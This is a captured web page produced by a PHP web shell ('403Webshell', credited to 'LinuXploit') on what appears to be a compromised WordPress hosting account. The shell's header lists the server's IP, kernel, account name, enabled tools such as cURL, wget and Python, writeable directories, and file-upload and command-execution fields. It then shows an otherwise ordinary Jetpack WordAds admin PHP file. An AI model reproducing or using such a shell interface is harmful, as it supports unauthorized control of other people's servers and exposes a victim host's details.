403Webshell
Server IP : 104.21.93.192  /  Your IP : 216.73.216.73
Web Server : LiteSpeed
System : Linux premium900.web-hosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : redwjova ( 1790)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/redwjova/fyntric.com/wp-content/plugins/jetpack/modules/wordads/php/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/redwjova/fyntric.com/wp-content/plugins/jetpack/modules/wordads/php/class-wordads-admin.php
<?php
/**
 * WordAds Admin.
 *
 * @package automattic/jetpack
 */

/**
 * The standard set of admin pages for the user if Jetpack is installed
 */
class WordAds_Admin {

	/**
	 * WordAds_Admin Constructor.
	 *
	 * @since 4.5.0
	 */
	public function __construct() {
		if ( current_user_can( 'manage_options' ) && isset( $_GET['ads_debug'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
			WordAds_API::update_wordads_status_from_api();
			add_action( 'admin_notices', array( $this, 'debug_output' ) );
		}
	}

	/**
	 * Output the API connection debug
	 *
	 * @since 4.5.0
	 */
	public function debug_output() {
		global $wordads, $wordads_status_response;
		$response = $wordads_status_response;
		if ( empty( $response ) ) {
			$response = 'No response from API :(';
		} else {
			$response = print_r( $response, 1 ); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_print_r
		}

		$status = $wordads->option( 'wordads_approved' ) ?
			array(
				'color'    => 'green',
				'approved' => 'Yes',
			) :
			array(
				'color'    => 'red',
				'approved' => 'No',
			);

		$type    = $wordads->option( 'wordads_approved' ) ? 'updated' : 'error';
		$message = sprintf(
			wp_kses(
				/* Translators: %1$s is the status color, %2$s is the status, %3$s is the response */
				__( '<p>Status: <span style="color:%1$s;">%2$s</span></p><pre>%3$s</pre>', 'jetpack' ),
				array(
					'p'    => array(),
					'span' => array(
						'style' => array(),
					),
					'pre'  => array(),
				)
			),
			esc_attr( $status['color'] ),
			esc_html( $status ),
			esc_html( $response )
		);

		wp_admin_notice(
			$message,
			array(
				'type'           => $type,
				'dismissible'    => true,
				'paragraph_wrap' => false,
			)
		);
	}
}

global $wordads_admin;
$wordads_admin = new WordAds_Admin();

Youez - 2016 - github.com/yon3zu
LinuXploit